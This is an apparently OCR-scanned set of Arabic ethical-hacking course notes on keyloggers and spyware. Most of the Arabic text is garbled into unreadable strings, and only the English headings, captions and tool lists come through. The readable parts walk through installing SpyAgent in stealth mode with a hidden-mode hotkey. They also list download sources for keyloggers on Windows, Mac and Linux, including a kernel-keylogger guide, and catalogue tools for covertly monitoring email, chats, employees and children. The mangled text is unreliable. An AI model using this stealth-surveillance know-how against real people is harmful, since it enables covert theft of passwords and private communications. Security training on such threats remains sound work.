J;i^uaaj .lUs ^ driver's J ^ jJI c> c£' Vj jjujUJI cjUIaxJ ajjuuIU UUj cJli^ ;PS/2 and USB Keylogger 

i^j jjJ^3Vl ^jJt (JjLuij ^—^-^ J 6 Jjj^l ^-jjli^Q 4j*. jj ^j^lLauJl <Jj3 (J-g 1 ^jj ^^jll ^JjlLJl dlljJjJa ^J*?* 

.£cll 'IMS 6<WLaiJl Cjllifkill 4^Jjj]| Cj^Uuujj 

djl jjuflVl Jjj^ ^ s jjis (capturing receiver) Jl^l jU^ H f l^^l <^ :Acoustic/CAM Keylogger 
.^jjLLaII ia. jl cjILU Jj^ i C5 lc Sjjta ^ c _^j3I CAM j' ^Si-all ^-^w ^ * jjs^ 

11a Ciijjj 6^.1 j s . cjjjSjI I c^j ^ tiaia 6^.1 j s lJ^JI jjjjj*£]| jl^ C5 i*i3l Jjj^ajll t .^Wn :Bluetooth Keylogger 

iaJj J^Li. ^gjjAaJl Cji jll J ^JjlLJl CjUaxjJa CjLg jl*-* jIjjJjujI c*I&aJj ^JjlLJl djUjjJa ^ja^ (JJ=»^ 4L_fl^Jl jj jJJ^ti Jc 

s- 3 jSJW jjlj l-jILjj V jj^jLill ^j^l 11a ^Bluetooth Keylogger u^- ^ -^-^ : Wi-Fi Keylogger 

11a .^jjUaII <iasuJa CjU jlstxi jbjiuiV (Bluetooth Keylogger J Jj> > jlg^) J^j ciuiLJI jj jjj*£3I JU^ u-* 

^JjlLJl ClAjjjJa (J^joUJ ^ajll . JJ jJAa£ jl$J> Jc (JasUj SLgLgJ t flJo£A] <JjUj JJC-J drfverS J' ^? ' ; lilaJJ V jj^> J^£^ 

_lajjaa>i ojjj^xi j SjjS (_^j>» cs - ^ C5^J^^V^ (J^O^ 3 U^ 0 <*— ^ jl*-all J-^JL? 

2. Software Keystroke Loggers 

(Jj^ i oj] L_flj^JI jj* jjj>^3I jt$j> J ^jjj^iyi ^j^t c3^^ ^-^f^ j^ ^ ^jjjjj ^jj (jc- sjW^ Loggers ^ ^ 

Sj^^V L-jL gall (j^aj£3! ^ (J^joJI t flip <JiL<j ^ La i oaSI dlLa jIslxJI ^jj j^J ^aJJ IjA .^JjlLJl 4_a. jl Jc 1 ^jjlj£ ^JJ ^JjlLJl djUjjJa ^Ja^. 

jjjjII jjc CjUIjjII Jc (J jj^^Jl ^aJJ <jV <iaxjJall diljljj Jc <J ^aJ] j^>^ uJI ( . ul a ^j-d ^jUJI J jj^ jll L_J jlla-d jjc. . jj jJJ^ll 

tUiajl AjflLJa! djUljj ^J^c. J jj^a^JI Sj^SlI Ajji {j-p*^ jjj^ J Software Loggers .^Lj Sjjj^ djljja ^ jjj^IVI 
.^Ijji ai^ Jj Software Loggers < %u^j ^jj .Hardware Loggers aj^UII SjSlill ^^j^kj Jja ^ j^jii V tiij^ 

Application Keylogger 
Kernel Keylogger 
Rootkit Keylogger 
Device Driver Keylogger 
Hypervisor-based Keylogger 
Form-Grabbing-Based Keylogger 

Application Keylogger 

Loj tCjlijjIajll (j* Ia jjc. j t^LJjjjjJIj t^jjj^lVI ^jJ^ cJ^^j - ikludAll <jj£j Ui (JS <jal jaj till ^&jujj Application Keylogger 

A£jjoJI ^V^J J£ Jj> > uJ j ^JJj] LaLaJ ^J-* J^C. jA .dljjjjVl iaUjdj dj!>L^jaj ^Jjj* <fc5 J^- <^V^ a J l^A ^ . JJ^>^^ c — ^ ^ 

Kernel Keylogger 

(j* ^ jjll IjA I^LuiaSI ^-^J CjljjJiajj <Jjou31j <j^Lk. 44iUjjj£l L-Jju aJ j^a t^UlUj .JjjJ^ll/Sl jjll ^ jlm^ ^^ic jj^. J^J^^ Aa. jj* 

,^jjILJ! <ja. j] ^^ic <jjj£-<JI CjLa jIslxJI ^j^^ ^j <J jll L-Loil^Q (_3^j ^IjIIjj t^jj'lLJI j] ^ (Jjxjujj £c-g!jj l!^ cJ-**^ j^>^ J^J^^ 

Rootkit Keylogger 

^Uajll (> ^^j jj^ jLSII 11a .^jjUJI djUj^ia J£ J^uj ^ill jj jj^j jU^ J^-^ Rootkit-based Keylogger 

A Cj\ jjVI j) <jjoalji3l CjI jjVI ^ t q/^ti <jAa jjc. j 

Device Driver Keylogger 
Jii^ ^ij _4A A jaAll Keylogging ^i^j ^ i/o driver <J^ J^h .Device Driver^ ^jIc Jaxj jj^jl£3l ^ ^jj^l liA 

^likj ^aJJ .dljjjjVl 4£jjui j!>Lk J^^ ^j ^ M i " jj ^aJJ ^aJ (j>»J O 1 sIa <J J^.jll Jj^jouI JJ jJJx^ll ^^ic ClJj^.1 ^^jll ^JjlLJl 

^ljj| <fc5 J^- tJjXJujjll ^aUaj ClalaLo IA JJ-GJ L-J3U aJ l^jlj I^A jj^- J^^^ ^JsjujI jJ L— lJj£ C5^J J^^ C5^) ^ ^ ' " jj r*^ ' 
Hypervisor-based Keylogger 
lU^ ^1 ^Ln^JI Hypervisor jt t>^ (Hypervisor-based Keylogger) ^ ^ 
. (virtual machines)^** jll J^Jdl Jl* .1^1 J U^u^ <A\ 
Form Grabber-Based Keylogger 
a^jSi! axj ^ Vjl Cij j^VI a<^A l_ijj3I g-iUj cjUUj ^Forrn Grabber-Based Keylogger J 

jjjL l^j]! g-i cj^LkA^ Jj?^4? f 'Form Grabber-Based Keylogger .HTTPS JjW^ ^ ^ j^V^ 

_<illa jll (Jjoij Jc <Lajta3l ^jjL^aJ Jj-> > uJ 



Methodology of Attacker in Using Remote Keylogger 
AjauJal] c_aL3! I1a JLoj jjj (malicious executable file) V jl ^ j£j ^W*^ u° lP 3 j*^ 

^AkjjaixJl ^l^k <illi JJC. jl ;(< ; llc.| jl JlLd t^fljka t flip s-ljj jUia L_aL» s-liiJ ^1) ^jjl&lVI LS^^ 3 

\ ^JJ 4-lasLjJa <J£ J ^ajL} Keylogger .^J^ 1 ^ 4_1juu31j J^C. Ljajl <j| Lg£ ^aUaill Jc ji^^ 2^^^ CllIJJJ <j| 

djULai^Jl ^ > J > ^—3^ J^*-* <J> c *\a AS . <J^juJI c aLo jl ^ > ,Vi c flLa J] 1 g laiaJ ^ajli ^aJ Ijjuj ^Vlm^l <Jj3 




[Figure: methodology of an attacker using a remote keylogger. A malicious file on the victim's machine captures the PASSWORD typed on the keyboard and either saves it to a local file or sends it to a remote location (the hacker). The capture techniques labelled are Keyboard injection, Driver injection, a further injection level, and Using GetAsyncKeyState, drawn across the User, Application, Driver, Keyboard and Windows Kernel layers.]



Acoustic/CAM Keyloggers 

<^ jl J£ ^ j^J^ I^a .A^jauJaUx^ ^-j^^j <^ j^3^ J^j^ Acoustic Keyloggers 

Jjj^il cj! Vit > ^ 1 ^> jl 1^000 c^j^ "learning period" t> The acoustic Keylogger 



L_flj^JI lP 3 *^ f ^ iaJLuj| ^jj i o <jV ^Ui^ cJ^ ^ ~ laJLujj c^^l ^jiill ^jjjLojI ^^ic - ^>^yi cjUUJI acoustic Keylogger 

^jiilLJl djlj^jja djUail iklj Vin^l Ijj^l^ll ^ Jail lLu^ .^jjILJI djbjjja Jj-> > Ij^l^ll ^al^klojl J*^j A CAM Keylogger 

.CAM Keylogger cia ^ l^JU J ^ ^3! CjIUI 
[Figure: Acoustic keylogger and CAM keylogger. Left: the user presses "A"; the electromagnetic/acoustic waves from the keyboard are picked up by a capturing receiver, which recovers the typed alphabet and transmits it to the hacker. Right: a camera takes a screenshot of the user pressing "A" and transmits it to the hacker.]



Keyloggers 

l^l^kiujl Aft dj ^jJt j lsj^ Jj^- cill^i ^acoustic/CAM Keyloggers l^i^U* ciuj ^1 cjU jlx^ll l-uL^j 




[Figure: a PS/2 keylogger, and a keylogger embedded inside the keyboard.]
Keylogger: Spytech SpyAgent 

Source: http://www.spytech-web.com 
^j* ^^klauJI jj jjj^ti ^jjILJI CjUjjja till ^joij (^ill j ^jjILJI ciiUaijja Jj-> > >nl ^Ujj j& Spytech SpyAgent 

j^^jjouJl jj j.Ua£ jl^. ^^ic Ajlljlt JJ-^VI 4jSI^>aJ cill ^--<u.nJ <jl Ij^ajl (j^J .^Jc- 

.CIajjjjVI (^g-lc diiaj c ^j3I l— l^ali CjUIac ^.j.aj> >>n 
.^l^kloaVl .liS CjllniaJ*llj £L*I jA\ ^ La 4jSI j* 



.(uploading) ^jl^ ^ ji (downloading) <J^3lb ^ ^wim^ l ^ 

,4-Jjjuall ^^JjoiaII JjuJI < ** & &l£ t 
ajl! $.Aj JjjS jijl Ja£3 tilli AxJj 6<Jjal j* .JJjJ <_£,j]l JJ jJJx^ll ^^ic AjJJJJ j ^^^jojjII £fj j-oll (j-a ^xiUjill l^A (Jja^l c*1j£ 

. JJ jJJ^ll (^Ic ^JjkjjauJl JaLuU <J j^. till <Jjou11j JJ-aVl (j-a J^C (J^jujJ L_fl jjoj j ^^^^joi 

lujjjli ajLac. ^j-<i <1^.jaJ! ^1 <Jj^j cjt^ 1 ^-jl^u (j^aLkll Wizard l^^A 3 a-Aac. Ijjj -\ 



[Screenshot: "Select SpyAgent Installation Type" dialog ("Click the type of Setup you prefer, then click Next"). The two options are:]
Administrator/Tester - Program will be installed with all software options and accessible via Windows start menu. This is recommended also for new users; Help documents are installed.
Stealth Installation - Program will be installed with minimum required options and no shortcuts included in Windows start menu. Also HELP Documents are NOT INSTALLED.



j\ J^j Next (jj* Administrator/Tester CujSsII <^ t> ^ jA\ ^ ^ -2 

[Screenshot: Spytech SpyAgent Setup dialog.]




JjjLjII j^-ki ^j CjjjjjII aA*c c ^1jj Close i3j* U^j ^ j* cjt^ Next Yes c3j^ -3 

l^Vl^ jjj-^1^ <-<^ JLk^l t . il kj ^^jll j ajJUJI <jujLuJI j^-k ^5^. continue cjj^ j ^jj^jVI 



[Screenshot: SpyAgent password dialog with the fields Old password and New password: "This password restricts other users from changing the SpyAgent settings."]



;aj11j1I ^I^cVI ^JjUi j^-laj ^5^. Continue c3j^ ^ ^ jjj - ^^ ^1S iklujl ^^-^ ^jf^ aJLujj j^-laj* -5 
[Screenshot: SpyAgent configuration wizard (steps 1. Configuration, 2. Extras, 3. Confirm Settings, 4. Apply, 5. Finish), "Please select a configuration package from the below options":]
Complete + Stealth Configuration - Configure to run in total stealth, with all possible logging options preconfigured.
Complete Configuration - Configure with all possible logging options preconfigured.
Typical Configuration - Configure with the most commonly used logging options preconfigured.



ajLc a!^jA\ fi Next <ija fi Complete + Stealth Configuration 4JL&\ ^ JiLk -6 

Finish ^ Next c3j* j& fi Display Alert at Startup cjI jlrk <c jlikj jI^cVI 

(jjjWill ajjoujjII <j^L5JI (J*** Continue <jj* j^" lsj^ Finish <jja j ^tac-VI ^ ^L^Vl aju -7 




[Screenshot: SpyAgent main window ("computer monitoring and surveillance software") with the Program Options, Log Actions, Reports and Help menus and a "Click Here for Ordering Information" link.]

.Start Monitoring c3> ? <*\*1\ ^vim^ l iat£> -8 
.Ctrl+Shift+Alt+M o> j^l c> ^ Stealth mode J\ J^VL eJ £ J£ Ail ULSi\ -10 
.Continue tij* j*^ j jj*^ 1 ^ ls-^jj <^Ij JU^' j '-^ ok lsj* j*^ f j*j-l 1 

. Ctrl+Shift+Alt+Mcba jail oc Stealth mode J^-U ^^^f 3 ««iSjSjVl ^ jVI -12 

<j ^13 U o^a^xj jjoj Keystrokes Typed jW^W f ^ jl j*^' lV (* ^ >> 1 ^ ^ ^ ^ ^jjj^ -14 



[Screenshot: SpyAgent Keystrokes Log Viewer (13 entries) with the toolbar buttons Save Log, Save All, Clear, Format, Actions... and Jump to Log..., and the columns Application, Window Title, Username, Time and Keystrokes Typed. The visible entries are Acrobat.exe ("CEH v8 Labs Module 05 System Hacking.pdf - Adobe Acro..."), firefox.exe ("New Tab - Mozilla Firefox"), explorer.exe ("no title") and sysdiag.exe, all for user jana on Mon 5/19/14 between 11:22:05 AM and 11:25:37 AM; the captured text shows keystrokes interleaved with [Alt], [Ctrl], [Caps Lock], [Backspace] and [Enter] markers. Note: log entries preceded with a * indicate a password entry.]
Keylogger: All in One Keylogger 

Source: http://www.relytec.com 

^vim^l iaUij J£ ^ j ^iilLJI CjUjjja Jj^uolL till ^joij ^ill j <^j^ j^c- jc. jK ^Ujj j& All in One Keylogger 

CjULlu^JI UjUIj (J^joill daliLo ^^aljjj jj jj;^^ ^a.IaJLui* £J*^ (j-a a U.VAfi ^ia^J Ijjuj £fiilU (ill ^ajujj . jj j-Ua£ll ^^-Sc 

^l^kjjajU aJUII ^UJjVI J*-* .LaLaj* C5^^ J^* uj-^j Windows lS^*-*^ •^ c - Ujliti ^joiij jc. jK .email/FTP/LAN 

;^»Ujill 

. ((J?* uid ^jjILJIJ ^jjILJI CjLjjJa ^<^. ialiiill -1 

,4_Jjjill JjLaljll JjI^juJJ -2 

. J^jjJajli a I laJLujI -3 
■ L&all ^clajui JaUij Jalilill -4 

.(Capture Screenshot) s^^t ojj^ Jalisll -5 

,<J^ Mill dAiLa ^ ^jjjuoII i_ laoll -6 

.^i.^tj <FTP 'c^JJ^V^ AD**' j^j^ J^>j] -7 
■uj^jj^..^ ^ cJj? ' ^ -8 
.HTML jaJS3*L53l -9 
. anti Keyloggers d^u -10 
l_j jc. j>» lSj^*** - 1 1 

.FTP jjjlii JL-j)-13 
.HTML jij* JL- jj -14 
.l^jfl j^-^ £^ dMj^ c ' - 1 5 
Keyloggers for Windows 

dAjjjJa (Jj^ i all CjIj^VI £>i& ft^lilLuiVI ^(jjjaJl 4_^ll<Jl jc. jK dAja ^j; c^IUa ttLLuj jc. ^jjuj ( ; a 

; Jj±Lj JJLuuil ^Uaj { J&* J^ju ^Hil jl£ 4ajV UA iaJL n 

Ultimate Keylogger available at http://ultimatekeylogger.com/ 
Advanced Keylogger available at http://www.mykeylogger.com 
The Best Keylogger available at http://www.thebestkeylogger.com 
SoftActivity Keylogger available at http://www.softactivity.com 
Elite Keylogger available at http://www.widestep.com 
Powered Keylogger available at http://www.mykeylogger.com 
StaffCop Standard available at http://www.staffcop.com 
iMonitorPC available at http://www.imonitorpc.com 
PC Activity Monitor Standard available at http://www.pcacme.com 
KeyProwler available at http://www.keyprowler.com/ 
Keylogger Spy Monitor available at http://ematrixsoft.com 
REFOG Personal Monitor available at http://www.refog.com 
Actual Keylogger available at http://www.actualkeylogger.com 
Spytector available at http://www.spytector.com/ 
KidLogger available at http://kidlogger.net 
PC Spy Keylogger available at http://www.pc-spy-keylogger.com 
Revealer Keylogger available at http://www.logixoft.com 
Spy Keylogger available at http://www.spy-key-logger.com 
SpyBuddy® 2012 available at http://www.exploreanywhere.com 



Keylogger for MAC: Amac Keylogger for MAC 

Source: http://www.amackeylogger.com 
^ c ^Jj J£ I jjoj J j-> > «\\\ t*lLa (jjjjud^jlU t*U ^joajj t*lL» Jj «juS j1I Ls lc j^-jK Amac Keylogger 

:4_i3U3l *UjuaVl J*ijJ 

m dA in'ql ikl j ^£1 ujj 
.^jjj jjj£Ui <ja!^13 jp <jl jjc (Jj^ > >n 

.(JjXjoLaII p^J Aio IjjoJ Ijjlllj (JxjuJJ 

cj! jja ^ email/FTP cj5LuJI JL* J 
Keyloggers for MAC 

d^Aj _ ]V[ 2i C (J^*-"-^ ^ ^aliaj ^^g-ic (J-a*J m jP> ^liAxJl 1 \ <aJI tilldA (Jj»-uiill lai] A > ^ all ^)C- CA SA^aJ (J!La 

Aj^aLaJI £3 1 j-<Jl IfrllA^J aJ _ ]V[AC OS*— j2 jj;^^ ^»Uaj ^^ic ~ I^JLuiaII JaLutJ Aj^jj t^JjlLJl dAjjjJa (Jj^ i «~ ^^Jc (il^cLaaJ 

;Mac OS » fUad jc. jK fhvU csI^Saj 
Aobo Mac OS X KeyLogger available at http://www.keylogger-mac.com 
Perfect Keylogger for Mac available at http://www.blazingtools.com 
Award Keylogger for Mac available at http://www.award-soft.com 
Mac Keylogger available at http://www.award-soft.com 
REFOG Keylogger for MAC available at http://www.refog.com 
KidLogger for MAC available at http://kidlogger.net 
MAC Log Manager available at http://www.keylogger.in 
Logkext available at https://code.google.com 
Keyboard Spy available at http://alphaomega.software.free.fr 
FreeMacKeylogger available at http://www.hwsuite.com 

List of Linux Key Loggers 

1. LKL 

http://kaz.dl.sourceforge.net/project/lkl/lkl-0.1.1/lkl-0.1.1/lkl-0.1.1.tar.gz 
a^j] iiia J!^k jai J£ J^ij jiii i aij LKL .linux— x86/arch ^vim^ l Aiu Ja*j j^jK y> LKL 

2. Logkeys 

Source: http://logkeys.googlecode.com/files/logkeys-0.1.1a.tar.gz 
<j£J j ^uberkey j LKL V t^liall (jAiJ j£ jK ^ U jj£ j-* U^ii ji&l -L >Aiil3 <j-aj^a^ j£ jK j& Log keys 

.£tJjtj cJ^^ ^ J-^'J t*vV%, i 

3. Ttyrpld 

http://kaz.dl.sourceforge.net/project/ttyrpld/ttyrpld/2.^ 
.ciL ^j^aLkJI si jj TTY l>* ^ Cy* 4-^^ (J&\ ^— >UI j^VI j jjj-* Jj> > ^.v^uhj Ttyrpld 

4. uberkey 

Source: ftp://ftp.nz.debian.org/freebsd/port^^ 

5. Vlogger 

Source: http://www.thc.org/releases/vlogger-2.1.1.tar.gz 
6. Simple Keylogger Python script 

Source: http://kaz.dl.sourceforge.net/project/linuxkeylogger/keylogger.py 

https://www.thc.org/papers/writing-linux-kernel-keylogger.txt 

Hardware Keyloggers 

^tiilLJI cAjjjJa J j> > qjj ^ul^klojl ^jj . jj j ^ x l l l j ^jjILoII 1 gJj > ^ jj ^jj 6 (jc ojUc Hardware Keylogger 

Hardware s jSti ^ciilLJI <^j3 CjUaUij ^.i^ J j-> > > n Hardware Keylogger ^ikluuJI 

^l^viml dj „ jj jjaa^II cJ^xjujj pAj (j£-<ui difl j ^jjILJI ciaUaxjJa lg La > >n jc. cjllulaj Jc Keylogger 

B t*Sa|jAl <jjSa^l ajjVI Hardware Keylogger 
KeyGhost 

Source: http://www.keyghost.com 

jW J£ f j*j ls^'j (tiny plug-in device) s j^-^11 cjUjSJI cjli jAKeyghost 

^bjlujl jl ^jjILJI dAjjjJa Jj^jouI ^cxaljJl (j-a ^1 lIjjjjj] ^ll^J V tttiaall CjI^j^x* Cli^Jl 

_ jj* jjj^£ Jc djUi jlx-<JI ^LajlajV j^.1 <lij^a jj* j (unplugged) cl>^ ^'^ 

J Jj| ^0 ^| a iklLuJj V 



KeyGrabber 

Source: http://www.keydemon.com 

6jj>j^a jj^^ J j-> > » n 6j^l .USB j» PS/2 ^Ijjuj ^tiilLJI ^ jl ^ £&jjILJ! djUjjja J j> > > nj ^ ^xujjj jl^j> KeyGrabber 

j^. J HDMI ^DVI ^VGAc>^^ j^V 1 
[Product images: the KeyGrabber hardware keylogger and the KeyGhost keylogger.]



Spyware 



'AIM 'AOL 'MSN < ICQ jjj* <-J£/J ^ <J ^) ^i^i^ J£ A£ jbj c^i ^1 ^1 jA\ 6g j jjSWI ^J^ 
i&a^ a Cjljiia ^^ic CjUail Uiajl iku .ciijjijVl C5 ic ciitjjL^ j &cjULaaJl c kL> 4 (Webmail j» Yahoo Messenger j 

4_ijL^ ^c^l^JI jl A-ijl a &1I ^c^l^JI o (jj^ Spyware uj-^ ^ . j2 jj.^^ <jujUjdj s^ujU* 4_L^l<J! <jS!^<JI Ij^l^ 

Spyware Propagation 

^j^xui j ^ j^l jj C5 ic (Jjjjuo^jII ^1 jj " piggybacking " 0* ^-aIc ^vim^U <j-aLaJt jl j^<&\ \ ^^Jc- 

jj jail djUill ^ 6^.1 j ^ ^1 j 1 (advertising cookies)^^)^ ^£ J*^ ^J*^ ^ ^" >> n (j m^M I jj ^jV 

.^jjjilVI ^^31 ^ " drive-by downloading" uW^I 

^Vlm^U ^aLkll jj jjj^ll jl^A ^^Jc l^-La ujJ j (jnmV^I 4 ^ si ^ a JlLd CljjljVl A^Jjai cJ^-^- (j- 0 (jnm^Ml 



[Figure: spyware propagation methods: drive-by download, masquerading as anti-spyware, web browser vulnerability exploits, piggybacked software and browser add-ons.]
What Does the Spyware Do? 

Jail jj jJi^I] Ajjjuu* 6Jj5S ^LlujI Jjtij <jl tilj£ aJ ;4_i^jJall jj jjjya£ll ^ Jc (jouui^jll CIiijjj ^L^J jj^aj 

- tali JJ CS - ^ ^V*^ (jjjjud^jl! ^cxal JJ £x» 4_l3tj3l JJ-<*V1 (j-a 

.hijacker j> ■^j J] IgJL » jj j uJI ^jj^j^jLuiaII CjU» jl*.* 4ijjui 

ClljjJjYi Jc- ^LqA^LolaII -laLuij j-o 
. dllj^lc- V I £Sl ClljjjjYl ^Aj^ald jj Sjlcjj 4j*X« j^ll <alnl<Jl iil jjll (jlajc 
.<Jjlxluj| > I^JLuiaII £J-*J ^t^J^ ^lAjqI ^^jJaljjaYI jljC-YI JJJ*J 

.<jjjj*J| ^jjjjud^jll Jj ( . ^Sajoi dll jL^lkl j 

.axj <> ^UV! £s\j*!L JL^jYI - 

■ t "^ ^j;^ jljSJjoil ^aJC Uiajl t ; UjujJj ^Uajll s-IjI ^paJ&aJ 
/ a^'i.^ ^jjj^IVI .JJJJ J^J^ 

■ g^aial l J^ j (dll) dynamically linked libraries c_AiLll Jjj*j 

.AjLa^JI jl-^J> dlLljcj jjjaj 
.l-aj^JI Ia jj jj jll ^1 jaII (jc jjj^sj 4jIj£ j .J-^j 

Types of Spyware 

JaLulj (jC CjU» jIslxJI <3jjoJ 1 g ^ ikluJj (jl (j£-*J jJl dljjijVI 4£jJuJ Jc« (J-GJU jll (JoUud^jll JJ (j-a 4_LallJj ^1 jj| JO 

;aJU3I ojjojlSI ^1 jjVI Jj Loja j .4jajx-G j Ajial j* ^jjAj jj jjj^I Jc- ^jj^jjuuJI 

1. Desktop Spyware 
2. Email and Internet Spyware 
3. Child Monitoring Spyware 
4. Video Spyware 
5. Print Spyware 
6. Screen Capturing Spyware 
7. USB Spyware 
8. Audio Spyware 
9. GPS Spyware 
10. Cell Phone and Telephone Spyware 

Desktop Spyware 

£L<^. jl ^vim^l <iajaul <J j^. djUi ji*-<i Jc <J jj^^JI ^1^.1^13 ^L«ft.t.nj ^dUjj jA (Desktop spyware) t . y&*\\ (jnm^i jj 

. J^j ^(Desktop)^^ J^ a£jj^3I ^^klu^ 

; Jj La jfiHj $ *W ^-AiuJ < j^oll ^Jouj iAj jujIjj 

,L_jjjjjVl cJjj> > >n j <jalj^ -2 
_c_jja jj3U l-jLi^jjII ^Ijjkjjojl Jj^jojj -3 
.jjvIj ^ j£ j^ ^ij^ J Igijjj^jj (activities logs) -lal^ull cjUL Jj^j -4 

https://www.facebook.com/tibea2004 AjjIs ^^aa^a 






Desktop Spyware: Activity Monitor 

Source: http://www.softactivity.com 
C5 l<i j n aj£ j tLa (jUij ^Lj^aflj djLi jIscaII cililaxj Uui ^LAN ^ ^^jII staVl Activity Monitor 

jl^. ^^ic Activity IMonitor (> *\"*" .lS^*-^j ^IaJI Cy* ^-^^ I^a (Jj^j .a£jjuo3I ^^ic a£jjoJ! ^ ^ i^iLu^q 

Asu ^jc ajjjjj (j^j Agent . jj* > ^ lS^c- ^^-^ ^ j 'Agent s- 3 L -^^>*^ (j^yi^ j^*-*^ 
a^j J Active Directory Group Policy e^J^ <> ji Activity Monitor Server 
C5 ic Agent ^u/" cs^^A 3 sbVI *>a& ^ asu ^jc <Jc (j>u>i-> n ^ji (j^j SjHunll d±aJ a£jJo3I ^ jii .Windows 

.a£jJo3I ^^ic <L^ai<JI j!i jjj^ll s £j A y ^ )*> Jj> > ^ Activity Monitor Server ^^-^ U>i ^ _ jj jn^ll 

.(Sjjj^II) AlxJl ( . n£ all ^JajaJ L_fljV (jiajC 

dujjj f^uijLijl] jj jjU^ll jI^a < fc5 ic- ^-Ij iS^^y* i^ax1\ (j^Uil ^-ia^J (activity log) ^UaUdill <J^joi lSj? 1 ^ 

.Activity Monitor 

JjLojjj (Jjoiljllll CjLoiJjJ t4 aILuiaH j <Loj^<J| jjj^3V1 ^^>J^ (JjLuij) ^A^Jjaui <J£3 diVU^Vl (jC (J-ol£ jjj^j u^3^ 

b j$sS Ail£ Jj>uJI jjjjx^I jl^a. ^ axj (^U jJI Activity Monitor Agent 

[Screenshot: Activity Monitor window.]
Desktop Spyware: other tools 

dAjjjJa Jj^joiJ ^1 g a\\ j£-oJ .^J^JjouJI dljjljVl j JJ jJJ^ll JaLud (jc Jjj^lilill <J£ <Jj^ > uJ j Jjk-aj] Ifr^AaJ ml (j£-aJ jnmV^I IjA .^Jt jll 
•JJjjJl J 6C_JJjL^.VI J t^aJ^JjouJl JJ Jjjrt^l cJ^XjuLill Jjfj £L-gI Jjll t^aJ^JjouJl <Jj3 (j-G l^JjL j C-LoJ ^^jll £§1 j-<Jl j t^JjlLall 

jj£I j JJxJl ^J^luiJl ^Jajoj J-a dilka] Ikl Ljajl A'^a) .c*13j U j j^l <jpte-l / jJfl <C_lULJl Jj^j j t^JjjJl j jJJ^Wl 

I^Ull j^jll (^5-^ 4_^.jJ>» Asu ^jc L_u£-<JI ^Jajuj Jj^ajl (jjy^lg-xJl 1 g ^ laJLujJ A3 ^^jl! ( . n£ all .< j.i.m-v'^ ^cxaljj j Za« J . J^^ cill^ 

Remote Desktop Spy available at http://www.global-spy-software.com 
SSPro available at http://www.gpsoftdev.com 
RecoveryFix Employee Activity Monitor available at http://www.recoveryfix.com 
Employee Desktop Live Viewer available at http://www.nucleustechnologies.com 
Net Vizor available at http://www.netvizor.net 
Net Spy Pro available at http://www.net-monitoring-software.com 
REFOG Employee Monitor available at http://www.refog.com 
osMonitor available at http://www.os-monitor.com 
LANVisor available at http://www.lanvisor.com 
Work Examiner Standard available at http://www.workexaminer.com 

Email and Internet Spyware 
1. Email Spyware 

CjUi^k tilli ^ Laj tSjjL^lt j SjjI jll ^ jjj^IVI «ijjJI cJ^^j jj j ' Jj> >>1 ^ j t-^ajJ ^nlaj jl ^Ujj Email spyware 

^jjjjo^j]! ciA^niaj ^ jjll 11a (jla jjjj c^iJI jj jji^ll j^-?* . j^^3 Hotmail c^jj^V^ 

^Jc. <Jai^j jl ^ ^ A\ ^jjj^iyi ^j^t (S^^- Cy* ^ SjjI jll ^jjj^IVI ^jj^ cJ^-^j £j Ag y Cy* \ ^ 1 ^ J-^jjj lS? 1 "j 

aIij ^ jjlj V jjj;!!^! ^ ^^kiaiJI stealth mode f^jJt tA^a jl jj jji^H c^^^ o-^j^^ 

2. Internet Spyware 

o^ ^"" 1 ^ c> W) J f 3 cr^^ ^j^^ CjUi^a cill ^1 sbVI <jA Internet Spyware 

c ftJj^H IajI tiL ^j^aLiJ! jj jjj^ll J-g^ ^jj^n^l.^u Vj ^ C5^s 'stealth mode j^^ ^ L« >>n ^jj 

l^JL Mill c aLa ^a^jjauJl JjS (j-d l^jjbj C-Lqj ^^jII URL cl^j^- ^J^> . jj jjj^H j^-^ ^^-^ AlfLJl oIjVI ojA ^jc 

,(iL ^aLkJ! JJ jJJx^l! jl^a. Jc l^Jt-La JJJJ 4_LaaJJj3l CjIaI^II jl ^il jjjUc J^ij cJ^^ 

Email and Internet Spyware: Power Spy 

Source: http://ematrixsoft.com 

<J£ ujj _ jj jjjx^II jI^a jc Ijjxj el u£ UJ£ jjsu jl^-o tiL (j^aLkJI jj* jjjx^ll jlg-^. <jsIjaj till ^ajujj Power Spy ^jj 
Windows J IMS ^^j^j^ tl^jjU jj dL<»a Jll j^^j^j JJ^V^ ^J^^ cJ^^jj ^jjI^JI djUjjJa j jy^W 
'ICQ ^GADU-GADU ^Google Talk ^Tencent QQ 'Yahoo Messenger <SKYPE '(MSN) Live Messenger 
^31 J.J! CjUK j clipboard cJ^^ ^ ^ c> jStj '(AIM) AOL Instant Messenger 
J^joi Jj jjjtajll (Jjujjjj tljjoj (Jasuj t^Uaill (Jjxjujj £,jj £a UjliJj j^jj _6^iL<J| Cjlajflajllj tia! jill ^j3 tLljI^lLoixJl ^j3 tlfrJjtj£ 

.Jjjj J J^J^ (j* A\<i a ) .FTP J yHJJ^V^ 







Internet and Email Spyware: other tools 
6 ^uj^ j 6 yH jJ^Vt ^J^' J 2^ ^1 jxi^L ^jij U£ J j-> . . n i ^ jL Internet and email Spyware 

<£jjuJI iai^Jj dljjjjVI ji*^. (ililjlc. aaJ 4il j ^ all L_flj*l J^Jlj 4(j^aljSVlj * JJ jJJx^li CS"^ ^H^*^ ^--^J^J 

j^JUll j^jll Jc JjJJ^lVl .JJjJlj dujjjV I (JjJjud^jll £tx»ljJ C-paXJ Jj LgJSj ul^Jl j J^ a all 

eBLASTER available at http://www.spectorsoft.com 
Imonitor Employee Activity available at http://www.employee-monitoring-software.ee 
Employee monitoring available at http://employeemonitoring.net 
OsMonitor available at http://www.os-monitor.com 
Ascendant NFM available at http://www.ascendant-security.com 
Spylab WebSpy available at http://www.spylab.org 
Personal Inspector available at http://www.spyarsenal.com 
Cyberspy available at http://www.cyberspysoftware.com 
AceSpy available at http://www.acespy.com 
Emailobserver available at http://www.softsecurity.com 

Child Monitoring Spyware 

.cicala jjc. ji ciijjjjVLj ^L^alo *\ jjoj jj jjfaSlI Jc- tillUJal <j ^JL 1* 4j31j* j ^jjjj ^ ^j^jH Child monitoring spyware 
cjSjII ^Liaa Ai j*^ J Child monitoring spyware ^l^lal * CjI j* J Jilall <u ^jL U jiull ^> 

11a ^jli tC-ujiull Asu .^aaaL^j tiljl ^qjq^; qjAxj V ^— a jjuj ^llliJai (Stealth mode)^f^ J lU*^ ^ . jjj^I cs-^ 

-LaLudjll (j-a CjI jVql ikl j t^jjj jLall J^j J ^rjiUdlt diLjjJa j tlgjjL j l—LaJ £3 1 ^<Jl j t^A^jjuixJl ^c^l jjll <Jj^ > >nj ^jli ^jjlajll 

